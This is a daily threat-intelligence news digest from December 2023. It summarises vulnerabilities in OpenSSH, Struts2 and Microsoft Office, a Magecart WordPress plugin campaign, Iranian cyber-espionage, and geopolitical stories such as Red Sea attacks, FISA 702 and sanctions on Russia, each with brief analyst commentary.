Daily Drop (672): Houthi Attacks, Magecart campaign, OpenSSH: CVE-2023-51385, CN: PBC Crypto, Struts2: CVE-2023-50164, FISA Section 702, Roscosmos: Arrest, Peach Sandstorm, Agent Tesla: CVE-2017-11882
12-23-23
Saturday, Dec 23 2023 // (IG): BB // ShadowNews // Coffee for Bob
*Started adding the Proof Of Concepts (PoC) if available for mentioned CVE’s :
A Proof of Concept (PoC) is a small exercise to test a certain hypothesis or demonstrate that a potential project can be viable. It's primarily used to verify that certain concepts or theories have the potential for real-world application. The purpose of a PoC is to showcase the feasibility, functionality, and potential of a concept before proceeding to the development of the full-scale project. *
U.S. Declassifies Intel on Iran's Alleged Role in Houthi Red Sea Attacks
Bottom Line Up Front (BLUF): The U.S. has declassified intelligence indicating Iran's significant involvement in Houthi attacks against commercial vessels in the Red Sea, highlighting the increasing risk to a vital global trade route. The U.S. signals possible responses as it consults with allies, reflecting escalating tensions and the strategic importance of maritime security.
Analyst Comments: The recent U.S. declassification of intelligence on Iran's involvement in Houthi maritime attacks underscores the intricate geopolitical dynamics of the Red Sea region. This area is crucial for global trade, and disruptions here can have wide-reaching economic repercussions. The U.S. is signaling a robust stance, reflecting its commitment to ensuring the security of critical international waterways. This situation also illustrates the broader regional power struggle and the U.S.'s attempt to counter perceived Iranian influence. The strategic nature of the Red Sea, coupled with the increasing use of asymmetric warfare tactics like drone and missile attacks by non-state actors, is altering the traditional maritime security paradigm.
FROM THE MEDIA: Reports from the Financial Times highlight U.S. claims of Iran's deep involvement in planning Houthi attacks on commercial vessels in the Red Sea, leveraging Iranian-provided monitoring systems and tactical intelligence. The escalation began in November, with targeted attacks causing significant disruption and leading to extensive rerouting of maritime traffic. The U.S. response includes deploying carrier strike groups and considering strikes against Houthi targets, reflecting the seriousness of the threat. The Houthis, supported by Iran, have employed tactics such as seizing civilian vessels and using Iranian drones and missiles in their operations. The report emphasizes the criticality of the Red Sea as a global trade artery and the potential for a broader regional conflict impacting international commerce and stability.
Rogue WordPress Plugin: A New Threat to E-Commerce Security
Bottom Line Up Front (BLUF): Security researchers have uncovered a rogue WordPress plugin involved in a Magecart campaign, designed to steal credit card information from e-commerce sites. The plugin creates fake admin users, hides its presence, and injects malicious JavaScript to exfiltrate data, signifying an advanced level of threat to website security.
Analyst Comments: This discovery is part of a disturbing trend of increasingly sophisticated cyber attacks targeting e-commerce platforms. The use of a WordPress plugin for malicious purposes underscores the ongoing vulnerability of popular content management systems. It's crucial to understand the method of intrusion—typically through compromised administrator accounts or exploiting existing plugin vulnerabilities. The technical sophistication of hiding its trace and creating backdoor access points reflects a higher level of threat actors' capabilities. This incident should alert web administrators and security professionals to the persistent and evolving nature of cyber threats, necessitating rigorous security measures, continuous monitoring, and education on emerging threats.
FROM THE MEDIA: The rogue WordPress plugin discovered by threat hunters is part of a larger Magecart campaign aimed at e-commerce websites. It's designed to create bogus administrator users and inject malicious JavaScript to steal sensitive credit card information during transactions. Once installed, it replicates to critical directories, ensuring it remains active and concealed from the website's admin panel. The plugin's persistence mechanisms and its method of stealing data directly from checkout pages represent a significant security concern. The increasing sophistication of these attacks, along with the recent discovery of similar campaigns leveraging different technologies for skimming, highlights the ongoing risks and the need for comprehensive security strategies in the e-commerce domain.
READ THE STORY: THN
Critical Remote Code Execution Vulnerability in OpenSSH: CVE-2023-51385
Bottom Line Up Front (BLUF): A high-severity vulnerability, CVE-2023-51385, has been identified in OpenSSH's ProxyCommand and ProxyJump features, allowing potential remote code execution. The flaw impacts all OpenSSH versions prior to 9.6p1 and has a CVSS score of 9.8, signaling its critical nature.
Analyst Comments: The discovery of CVE-2023-51385 in OpenSSH, a staple of secure network operations globally, underscores the persistent vigilance required in the cybersecurity domain. The vulnerability's potential for remote code execution, especially in such a widely used protocol, amplifies the risk factor significantly. It highlights the ever-present need for rigorous input validation and sanitation in software development, as well as the importance of regular security audits and updates. As attackers continually evolve their tactics, the identification and prompt addressing of such vulnerabilities are vital in safeguarding digital infrastructure.
FROM THE MEDIA: CVE-2023-51385 is a critical vulnerability in OpenSSH's ProxyCommand and ProxyJump features that could allow attackers to execute arbitrary commands on target systems. This flaw arises from insufficient validation of user-supplied input, specifically hostnames with shell metacharacters. The widespread impact across various operating systems and the critical nature of SSH for secure communications make this vulnerability particularly concerning. Users and organizations are urged to update to the latest OpenSSH version, 9.6p1, to mitigate the risk. The rapid identification and patching of such vulnerabilities are crucial in maintaining the integrity and security of network operations worldwide.
READ THE STORY: Cyber Kendra // PoC
China Calls for Enhanced Global Crypto Oversight Amid Financial Stability Concerns
Bottom Line Up Front (BLUF): The People's Bank of China (PBC) has stressed the importance of global cooperation and consistent regulatory oversight over the burgeoning crypto market in its latest Financial Stability Report. The report comes amid rising concerns about the speculative nature and potential financial system vulnerabilities posed by cryptocurrencies, advocating for a unified supervisory approach to mitigate risks.
Analyst Comments: The PBC's call for enhanced global crypto oversight is a significant indicator of China's proactive stance on financial technology and its potential risks. By highlighting issues like insider control, asset concealment, and security vulnerabilities specific to crypto assets, the report reflects a growing global consensus on the need for a structured regulatory framework. The push for international cooperation against the backdrop of recent market upheavals, such as the FTX collapse, underscores the urgency for a cohesive approach.
FROM THE MEDIA: The PBC's Financial Stability Report 2023 underscores the exponential growth and inherent risks of the global crypto market, urging for a "same business, same risks, same supervision" approach. It elaborates on a six-pronged strategy to secure the DeFi ecosystem, emphasizing governance, operational control, and enhanced supervision. The report acknowledges crypto assets' limited yet significant impact on the global financial system, advocating for regulatory restructuring and market reforms to manage inherent risks effectively. The focus is on preemptive measures against vulnerabilities, particularly in light of increasing cyber threats, and the need for international regulatory harmony to address the cross-border nature of crypto assets.
READ THE STORY: Coin Pedia
Critical Vulnerability in Apache Struts2: CVE-2023-50164
Bottom Line Up Front (BLUF): Apache Struts2, a widely used framework for developing Java web applications, has a critical vulnerability, CVE-2023-50164, that allows for remote code execution. This vulnerability is severe, with a CVSS score of 9.8, and affects a broad range of Struts2 versions, necessitating immediate and comprehensive remedial actions.
Analyst Comments: The discovery of CVE-2023-50164 in Apache Struts2 is a stark reminder of the continuous threat posed by legacy software vulnerabilities to modern digital infrastructures. Remote Code Execution vulnerabilities like this represent a high-risk impact due to their ability to allow attackers to take complete control over affected systems, leading potentially to widespread data breaches, system takeovers, or other malicious activities. This situation is exacerbated by the widespread use of Struts2 in enterprise applications, highlighting the critical need for timely vulnerability management and the proactive security posture of organizations globally.
FROM THE MEDIA: CVE-2023-50164 is a critical remote code execution flaw found in Apache Struts2 due to improper handling of file upload requests. This vulnerability can lead to attackers gaining control over affected systems, putting sensitive data at risk. The bug affects multiple versions of Struts2, and Apache has provided patched versions as a remedy. Organizations are urged to upgrade immediately to secure versions and conduct thorough environmental scans to identify and patch vulnerable applications.
READ THE STORY: Security Boulevard // PoC
Biden Enacts Short-term Extension of FISA Section 702 Amid Congressional Divide
Bottom Line Up Front (BLUF): President Biden signed a short-term extension for Section 702 of the Foreign Intelligence Surveillance Act (FISA), a key but contentious U.S. surveillance tool. This temporary measure extends digital spying capabilities until mid-April, amidst ongoing congressional debates and divides over long-term reauthorization and necessary reforms.
Analyst Comments: The extension of FISA Section 702 by President Biden reflects the ongoing complexity and contention surrounding surveillance laws in the U.S. The short-term nature of the extension underscores the difficulties in reconciling security needs with privacy concerns, particularly given the recent history of FBI violations and the incidental collection of Americans' communications. As Congress grapples with how to move forward, the tension between national security imperatives and civil liberties remains at the forefront, necessitating a delicate balance. The spotlight on proposed reforms and their potential impact on surveillance practices suggests a critical period ahead for U.S. intelligence and privacy laws.
FROM THE MEDIA: President Biden's recent signing of the short-term FISA extension is a stopgap measure amid a broader debate over surveillance practices and privacy protections. Section 702 allows for the collection of foreign intelligence, including internet and phone activities, but has been criticized for also sweeping up Americans' communications. The extension follows a failed attempt by the House to secure a longer-term renewal, reflecting deep divisions over the program's future. Civil liberties advocates and some lawmakers are pushing for significant reforms, particularly increased oversight and stricter controls on the querying of Americans' data. The coming months are expected to see continued discussion and potentially pivotal changes to how the U.S. approaches and regulates surveillance.
READ THE STORY: The Record
Russia Space Agency Official Detained Over Multi-Million-Euro Fraud
Bottom Line Up Front (BLUF): The Russian investigative committee has detained Oleg Frolov, the deputy director of Russia's space agency Roscosmos, along with two other suspects, on charges of embezzling 4.3 million euros from the space sector. The arrests come amidst a spate of financial troubles and corruption scandals plaguing the once-proud space agency.
Analyst Comments: The detention of a high-ranking official from Roscosmos marks a significant development in the ongoing scrutiny of corruption within Russia's space industry. The arrest of Frolov signals a broader crackdown on financial misconduct in sectors critical to national pride and technological progress. This incident highlights the increasing challenges Roscosmos faces, including financial instability and technical failures, as it continues to compete in the global space race. These developments may impact Russia's future space endeavors and its reputation in the international space
FROM THE MEDIA: Russian authorities arrested Oleg Frolov, deputy director of Roscosmos, and two others for alleged involvement in a "large-scale fraud" scheme, leading to the misappropriation of 4.3 million euros intended for the space sector. The arrests reflect ongoing issues within Roscosmos, which has been marred by corruption scandals and operational failures, including the recent loss of the Luna-25 probe. Despite these setbacks, Russia remains committed to its ambitious space agenda, including plans for an independent space station and revitalizing its moon program. The case underscores the gravity of corruption within essential national sectors and the need for rigorous oversight and accountability.
READ THE STORY: Reuters
Iran's 'Peach Sandstorm' Cyberattack Targets Global Defense Networks
Bottom Line Up Front (BLUF): Iranian nation-state cyberattack group, known as Peach Sandstorm, is actively targeting the global military-industrial sector with a custom backdoor named FalseFont. The sophisticated cyberattacks aim to infiltrate and compromise systems integral to the research and development of military technologies.
Analyst Comments: The emergence of the FalseFont backdoor as a tool for Peach Sandstorm (also known as APT33, Elfin, Holmium, or Refined Kitten) reflects a continuing trend of nation-state actors developing and refining cyber espionage capabilities. These attacks, primarily focusing on the satellite and defense sectors, indicate a strategic interest in gaining a competitive edge in military technologies and intelligence. The consistent evolution of Peach Sandstorm's methods and the targeted nature of their campaigns underscore the persistent threat posed by state-sponsored cyber actors and the critical need for robust security in defense-related industries.
FROM THE MEDIA: Iran's cyberattack group, Peach Sandstorm, is deploying the FalseFont backdoor to infiltrate organizations within the global military-industrial complex. According to Microsoft Threat Intelligence, the backdoor enables remote access, file execution, and data exfiltration. Targeting the defense and satellite sectors, Peach Sandstorm's activities in 2023 have been characterized by a keen interest in military technology and development systems. The development of FalseFont signifies the group's ongoing efforts to enhance their cyber capabilities and signifies a continued threat to global defense networks and infrastructure.
READ THE STORY: DR
US Targets Banks Funding Russia's Military Industrial Complex with Sanctions
Bottom Line Up Front (BLUF): The Biden administration is set to issue an executive order to impose sanctions on foreign financial institutions that are supporting Russia's military industrial complex. This move is part of the broader strategy to undermine Moscow's ability to sustain its military operations in Ukraine by targeting the financial mechanisms facilitating the acquisition of essential equipment and goods for the war.
Analyst Comments: The impending sanctions signify a tactical shift in the U.S.'s approach to economic warfare, targeting the financial lifelines that enable the continuation of the conflict in Ukraine. By focusing on banks, the U.S. aims to disrupt the supply chain of critical components needed for Russia's military endeavors. This move underscores the broader geopolitical struggle, reflecting a strategic effort to pressure not only Moscow but also the international financial institutions that indirectly support its military actions. The effectiveness of these sanctions will depend on the cooperation and compliance of global banking institutions, as well as the adaptability of Russian procurement strategies.
FROM THE MEDIA: According to the Financial Times, the upcoming executive order by the Biden administration will enable the U.S. to place sanctions on banks aiding Russia in procuring equipment and goods vital for its military operations in Ukraine. The U.S. Treasury has emphasized that severe consequences await those financing and facilitating such transactions. The move is aimed at making the financial system a choke point for Russia's access to sensitive items like semiconductors, machine tools, and other critical materials. While many Western banks have already ceased their operations in Russia, the continued presence of some, along with the increasing involvement of Chinese lenders, presents a complex challenge to the enforcement and effectiveness of these sanctions. The U.S. intends to work closely with U.S. and European banks to ensure compliance and prevent the circumvention of these new measures.
The Growing Liability of Artificial Intelligence in Business and Society
Bottom Line Up Front (BLUF): Discusses the increasing liability concerns surrounding artificial intelligence, citing examples from the automotive and healthcare industries. It delves into the challenges of regulating AI, the ongoing lawsuits, and the ethical implications of automating processes with AI technologies.
Analyst Comments: Artificial intelligence has transitioned from a promising technology to a complex liability with incidents and lawsuits beginning to surface. The balance between innovation and control is precarious as evidenced by cases like Tesla's autopilot-related accidents and the misuse of AI in healthcare for denying care. The industry's response, focusing on "guardrails," is indicative of the inherent risks in deploying AI systems. The narrative of AI as a liability, juxtaposed with historical warnings like Frankenstein and Pandora's Box, underlines the need for cautious optimism and robust regulatory frameworks. The piece also hints at the tech industry's cyclic fascination with emerging technologies, positioning AI as the latest in a series of disruptive but potentially overhyped advancements.
FROM THE MEDIA: Highlights several instances where AI has proven to be more of a liability than an asset. It cites the case of a Tesla driver's fatal accident while using Autopilot and the lawsuits against United Healthcare for its AI model denying care to seniors. It discusses the inadequate nature of current legal frameworks to address AI-related incidents and the potential regulatory measures in the pipeline, including the European Commission's efforts and the proposed Bipartisan AI Framework in the US. The critique of the hype surrounding AI suggests that the rush to adopt AI technologies might be overlooking significant ethical and practical concerns. Moreover, it points to the industry's vested interest in promoting AI, given the major tech companies' stakes in cloud and hardware related to AI processing. The conclusion emphasizes the need for more human-centric deployment of AI, urging a balance between technological advancement and ethical responsibility.
READ THE STORY: The Register
Hackers Exploit Six-Year-Old Microsoft Office Bug for Agent Tesla Malware
Bottom Line Up Front (BLUF): Cybersecurity experts have observed a resurgence in the use of a six-year-old Microsoft Office vulnerability, CVE-2017-11882, by hackers to deploy Agent Tesla, a sophisticated malware. Despite the age of the vulnerability, its continued exploitation underscores the challenge of patch management and the risks of using end-of-life software.
Analyst Comments: The continued exploitation of CVE-2017-11882, a well-documented and relatively old vulnerability, serves as a stark reminder of the perennial issues within cybersecurity: inadequate patch management and the use of outdated, unsupported software. Agent Tesla's deployment through this exploit highlights the sophistication and persistence of threat actors who capitalize on these systemic weaknesses. This situation underscores the need for organizations to prioritize regular software updates, retire end-of-life systems, and maintain vigilance against seemingly outdated but still potent threats. As long as there remains a divide between the security "haves" and "have nots," the cycle of exploitation is likely to continue, emphasizing the need for more accessible and sustainable cybersecurity practices across all sectors.
FROM THE MEDIA: Threat actors are increasingly leveraging CVE-2017-11882, a six-year-old remote code execution flaw in Microsoft Office's Equation Editor, to distribute Agent Tesla malware. This malware, known for its capabilities like keylogging and credential theft, is primarily spread through phishing campaigns that use deceptive emails with malicious Excel attachments. Despite the vulnerability's age, its continued effectiveness is attributed to organizations' use of outdated software and lack of timely patch implementation. Experts highlight the criticality of robust phishing protection and the need for security measures that can effectively detect and neutralize threats like Agent Tesla.
Items of interest
China Requests U.S. Sanction Exemptions for Russian LNG Project
Bottom Line Up Front (BLUF): China's oil majors CNPC and CNOOC have officially requested the U.S. government for exemptions from sanctions targeting the Arctic LNG 2 project in Russia. These moves underscore the intricate geopolitics of energy security and the challenging balancing act for multinational corporations amid escalating tensions.
Analyst Comments: The request from CNPC and CNOOC for U.S. sanction exemptions reflects the complex interplay of global energy politics and the strategic importance of the Arctic LNG 2 project, not just for Russia but for its international stakeholders. This action signals China's intent to protect its economic interests while navigating the delicate geopolitical dynamics resulting from the Ukraine conflict. The situation highlights the broader implications of U.S. sanctions, affecting international collaboration in significant energy projects, and raises questions about the effectiveness and reach of unilateral sanctions in a deeply interconnected global economy.
FROM THE MEDIA: According to Reuters, both CNPC and CNOOC, with a 10% stake each in the Arctic LNG 2 project, have sought exemptions from U.S. sanctions recently imposed in response to the ongoing war in Ukraine. These sanctions could impede LNG vessels servicing the project and threaten the companies' other international engagements, including LNG purchases from the United States. As the project is vital for Russia's aim to expand its global LNG market share and significant for the energy strategies of other stakeholders like France's TotalEnergies and Japan Arctic LNG, the outcome of these exemption requests could have substantial implications for global LNG supply and geopolitical relations. The U.S. State Department's engagement with partner countries over the sanctions indicates the diplomatic sensitivities and economic stakes involved.
READ THE STORY: Reuters
Historic shift in Russian energy flows, becomes China's 4th largest LNG supplier (Video)
FROM THE MEDIA: The coordinated sanctions imposed on Russian oil and gas by the US, Europe and their Pacific allies have led to a historic shift in the direction of the Russian energy flow. China, which already is a huge importer of Russian energy supplies has been soaking up more Russian natural gas as compared to the previous years.
How China Plans to Win the Future of Energy (Video)
FROM THE MEDIA: China, the world’s biggest polluter, has committed to reach net zero emissions by 2060, an ambitious goal matched by enormous investments that are reshaping the nation’s energy system.
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.